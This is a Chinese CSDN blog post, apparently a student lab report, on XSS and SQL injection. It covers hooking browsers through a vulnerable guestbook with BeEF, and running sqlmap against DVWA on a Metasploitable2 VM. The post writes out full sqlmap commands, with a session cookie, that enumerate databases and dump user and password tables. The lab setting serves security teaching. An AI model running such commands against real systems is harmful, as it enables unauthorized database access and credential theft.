XSS与SQL注入

最新推荐文章于 2024-07-25 18:08:40 发布
最新推荐文章于 2024-07-25 18:08:40 发布
阅读量369 收藏
点赞数 2
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51297226/article/details/111227420
版权

一、 XSS跨站脚本注入实验
实验环境搭建。
角色:留言簿网站。存在XSS漏洞;(IIS或Apache、guestbook搭建)
攻击者:Kali(使用beEF生成恶意代码,并通过留言方式提交到留言簿网站);
被攻击者:访问留言簿网站,浏览器被劫持。
在这里插入图片描述

网站搭建好后就开始用AWVS扫描该网页是否存在XSS漏洞
1、利用AWVS扫描留言簿网站发现其存在XSS漏洞,
在这里插入图片描述

2、 Kali使用beef生成恶意代码
在这里使用beef工具时出现了错误,不能使用默认的账号和密码,文件中添加一个账号即可

1

将它写到留言板上,当服务器去访问留言簿时,网站会自动解析这段恶意代码,与kali上的beef连接

在这里插入图片描述

在这里插入图片描述

二、SQL注入实验
在这里插入图片描述
在这里插入图片描述

实验环境:
实验设备:一台kali虚拟机, 一台Metasploitable2虚拟机(均采用桥接方式)
在kali中访问Metasploitable2的DVWA,将安全等级跳到low,不然不会有注入漏洞。
调试好之后,进行注入,第一次输入 1,第二次输入 1’ 。两次显回不一样,存在注入漏洞。
在这里插入图片描述

在输入1的页面按F12得出cookie
在这里插入图片描述

枚举当前使用的数据库名称和用户名
使用下列命令
sqlmap -u ‘10.70.120.146/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#’ --cookie='security=low; PHPSESSID=911e4c015aab9e4a3f52c8b57ab3a472 -b --current-db --current-user
在这里插入图片描述

枚举数据库用户名和密码
使用下列命令
sqlmap -u ‘10.70.120.146/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#’ --cookie=‘security=low; PHPSESSID=911e4c015aab9e4a3f52c8b57ab3a472’ -D dvwa --string=“Surname” --users --password

在这里插入图片描述
枚举数据库
使用下列命令

sqlmap -u ‘10.70.120.146/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#’ --cookie=‘security=low; PHPSESSID=911e4c015aab9e4a3f52c8b57ab3a472’ --dbs
在这里插入图片描述

枚举数据库和指定数据库的数据表
使用下列命令
sqlmap -u ‘10.70.120.146/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#’ --cookie=‘security=low; PHPSESSID=911e4c015aab9e4a3f52c8b57ab3a472’ -D mysql -T user --columns
在这里插入图片描述

获取指定数据库和表中所有列的信息
访问mysql数据库user表单
使用下列命令
sqlmap -u ‘10.70.120.146/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#’ --cookie=‘security=low; PHPSESSID=911e4c015aab9e4a3f52c8b57ab3a472’ -D mysql -T user -C user,password --dump
在这里插入图片描述

访问dvwa数据库users表单,即我们的登陆账号信息
使用下列命令
sqlmap -u ‘10.70.120.146/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#’ --cookie=‘security=low; PHPSESSID=911e4c015aab9e4a3f52c8b57ab3a472’ -D dvwa -T users -C user,password --dump

在这里插入图片描述
保存在本地的文件,用root权限打开便可以看到
在这里插入图片描述

MuXi牧兮
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
java的SQL注入XSS攻击
weixin_44976692的博客
01-15 2万+
通过了解和防范SQL注入XSS攻击,我们能够提高Java应用的安全性,保护用户的信息免受威胁。大家好,欢迎来到本文!在Java开发中,安全问题一直备受关注,其中SQL注入XSS攻击是两个常见的安全隐患。是一种攻击手段,通过在应用的用户输入中注入恶意的SQL代码,从而篡改、查询或者删除数据库中的数据。攻击者通过构造精巧的输入,使应用误认为这些输入是合法的SQL语句。**XSS攻击(跨站脚本攻击)**则是通过在Web页面中注入恶意脚本,使用户在浏览器上执行这些脚本,从而盗取用户信息或者执行一些恶意操作。
实验三:XSSSQL注入
yghlqgt的博客
11-27 733
试验前需要掌握的知识 下面内容是试验前你需要了解并掌握的知识,详细的内容可以移步到这篇博客中去学习:试验前的知识储备 XSS部分 1、什么是XSS 2 、什么是XSS攻击 3、 什么是Cookie 4、XSS漏洞的分类 5、XSS的防御 SQL注入部分 1、什么是SQL注入攻击 2、为何会有SQL注入攻击 3. 何时使用SQL注入攻击 4、MySQL简介 5、实施SQL注入攻击 6、防范SQL注入方法汇总 实验部分 实验目的: 了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法;了解SQL注入
xss攻击 SQL注入
qq_65208982的博客
06-10 1220
QL注入,是发生于应用程序与数据库层的安全漏洞。简而言之,是在输入的字符串之中注入SQL指令,在设计不良的程序当中忽略了字符检查,那么这些注入进去的恶意指令就会被数据库服务器误认为是正常的SQL指令而运行,因此遭到破坏或是入侵。SQL 注入一般发生在用户交互场景中,比如需要用户自已输入信息的输入框,或者下拉选择选项的这种,如果不做好输入内容的过滤,就很可能发生 SQL 注入
初识XSSSQL注入
m0_47968686的博客
12-03 483
XSSSQL注入 实验原理 ## 1.什么是XSS XSS又叫CSS (Cross Site Script) 也称为跨站,它是指攻击者利用网站程序对用户输入过滤不足,输入可以显示在页面上对其他用户造成影响的HTML代码,从而盗取用户资料、利用用户身份进行某种动作或者对访问者进行病毒侵害的一种攻击方式。 ## 2.什么是xss攻击 XSS攻击是指入侵者在远程WEB页面的HTML代码中插入具有恶意目的的数据,用户认为该页面是可信赖的,但是当浏览器下载该页面,嵌入其中的脚本将被解释执行,由于HTM
xsssql注入的异同点
2303_81631620的博客
04-19 268
2.sqlsql语句的拼接,需要用到一些数据库,列,段名等,都不是固定的,只不过有的出现的次数比较多,eg:information_schema信息架构是我们常见的,但它是mysql5.0以上版本才有的,不是全都有。1.xss:攻击者通过某些方法,将恶意脚本或命令嵌入(用夹带一词也行)到用户访问的页面中,当正常用户访问页面时,触发嵌入的恶意脚本/命令,从而达到获取cookie和种马等目的。,站在数据库的角度没有语法错误的语句都是正常语句,所以都会执行,然后就可获取本无法获取的数据。
XSSSQL注入
Radiency的博客
11-23 628
了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法;了解SQL注入的基本原理;掌握PHP脚本访问MySQL数据库的基本方法;掌握程序设计中避免出现SQL注入漏洞的基本方法;掌握网站配置。
经典:Web安全之XSSSQL注入
jklbnm12的博客
06-24 631
一、前言 近几年,伴随互联网的高速发展,对Web安全问题的重视也越来越高。Web应用所面临的威胁来自很多方面,其中黑客的破坏是影响最大的,黑客利用Web应用程序存在的漏洞进行非法入侵,从而破坏Web应用服务,盗取用户数据等,如何防范漏洞带来的安全威胁是一项艰巨的挑战。 为了增强用户的交互体验,开发者们在Web应用程序中大量应用客户端脚本,使Web应用的内容与功能变得丰富有趣,然而隐藏的安全威胁随之而来,黑客们将Web攻击的思路从服务器端转向了客户端,利用客户端脚本漏洞的攻击变得越来越强大,如跨站脚本
Java web防护xss/sql注入的正确姿势
Javee的博客
08-15 1253
Java web防护xss/sql注入的正确姿势 这里以springboot搭建的微服务为例,可以在网关中自定义全局拦截器,对入参进行过滤。防护的方法有很多,这里以黑名单为例,暂定项目中只存在POST和GET两种传参: 自定义防XSS/SQL注入攻击网关全局过滤器 package com.javee.getway.filter; import com.javee.getway.common.constant.WebBaseConstant; import com.javee.getway.common.m
实验三 XSSSQL注入
qq_60905276的博客
11-21 801
了解SQL注入的基本原理;加密用户输入的数据,然后再将它与数据库中保存的数据比较,这相当于对用户输入的数据进行了“消毒”处理,用户输入的数据不再对数据库有任何特殊的意义,从而也就防止了攻击者注入。在上面的案例中,查询操作本来应该在确保用户名和密码都正确的情况下才能进行的,而输入的注释符将一个查询条件移除了,这严重的危及到了查询操作的安全性。应用程序的功能是负责将用户提交的数据存储到数据库中,然后在需要时将这个用户提交的数据再从数据库中提取出返回到网页中,在这个过程中,如果用户提交的数据中包含一个。
XSS & SQL注入
10-30
XSS & SQL 注入 XSS(Cross-Site Scripting,跨站脚本)和 SQL 注入是两种常见的 Web 安全漏洞。下面将详细介绍 XSSSQL 注入的概念、原理和应用。 什么是 XSSXSS,或者称为 CSS,代表着跨站脚本。基本上,...
防止xsssql注入:JS特殊字符过滤正则
10-27
在网络安全领域,XSS(Cross-Site Scripting)和SQL注入是两种常见的攻击方式,对网站的安全性构成严重威胁。本文将详细介绍如何通过JavaScript特殊字符过滤正则表达式来防范这两种攻击。 首先,理解XSS攻击。XSS...
预防XSS攻击和SQL注入XssFilter
05-19
一、什么是XSS攻击 XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如这些代码包括HTML代码和客户端脚本。攻击者利用XSS漏洞旁路掉访问控制——例如...
java web Xsssql注入过滤器.zip
04-22
本项目"java web Xsssql注入过滤器.zip"就是针对这两种威胁提供的一种解决方案,基于流行的Spring Boot 2.0框架进行开发。 XSS 攻击是通过在网页中插入恶意脚本,当其他用户访问该页面时,这些脚本会被执行,从而...
扫描sql注入xss攻击的牛b工具
11-02
在网络安全领域,SQL注入XSS(跨站脚本)攻击是两种常见的威胁,它们针对的是Web应用程序的安全性。本文将详细介绍这两种攻击类型以及相关的防范措施,并介绍一款名为"扫描SQL注射与XSS攻击的牛B工具"的实用工具,...
科普文:Linux系统安全加固指南
为无为,事无事,味无味。
07-25 1090
本指南仅关注安全性和隐私性,而不关注性能,可用性或其他内容。列出的所有命令都将需要root特权。以“$”符号开头的单词表示一个变量,不同终端之间可能会有所不同。选择一个好的Linux发行版有很多因素。避免分发冻结程序包,因为它们在安全更新中通常很落后不使用与Systemd机制的发行版。Systemd包含许多不必要的攻击面;它尝试做的事情远远超出了必要,并且超出了初始化系统应做的事情。使用musl作为默认的C库。
人工智能:大语言模型提示注入攻击安全风险分析报告下载
cybtec的博客
07-25 1136
大语言模型提示注入攻击安全风险分析报告下载
安全与服务的双重奏:探究ISO20000和ISO27001的企业变革力量
最新发布
xinbiao001的博客
07-25 959
ISO20000是一个面向机构的IT服务管理标准,旨在提供建立、实施、运作、监控、评审、维护和改进IT服务管理体系(ITSM)的模型。它主要关注的是IT服务管理的流程和质量,帮助企业建立高效的IT服务支持,确保IT服务与企业业务目标一致,提高信息技术服务和运营效率,控制IT风险及相关的成本。例如,华为技术有限公司就通过实施这两项体系,提高了内部IT信息安全管理规范,改善了员工对信息安全服务的认知,提升了品牌形象,并促进了与客户的关系。成功的关键在于管理层对这一过程的承诺,以及员工对标准和流程的认同和遵循。
JAW:一款针对客户端JavaScript的图形化安全分析框架
FreeBuf_的博客
07-25 1720
JAW是一款针对客户端JavaScript的图形化安全分析框架,该工具基于esprima解析器和EsTree SpiderMonkey Spec实现其功能,广大研究人员可以使用该工具分析Web应用程序和基于JavaScript的客户端程序的安全性。7、设计并执行定制的安全相关程序分析,包括预定义 JavaScript 源和接收器之间的数据流分析、控制流和可达性分析、利用 DOM 快照解析 DOM 查询选择器、通过抽象语法树 (AST) 进行模式匹配等;5、支持交互式检测或自动检测不安全的程序行为;
XSSSQL注入实战:原理、防御与工具应用
网络渗透测试中的XSS(Cross-Site Scripting)和SQL注入是两种常见的Web应用安全漏洞,它们对网络安全构成重大威胁。本文旨在通过实验深入理解这两种攻击手法,并学习相应的防护措施。 首先,XSS(Cross-Site ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值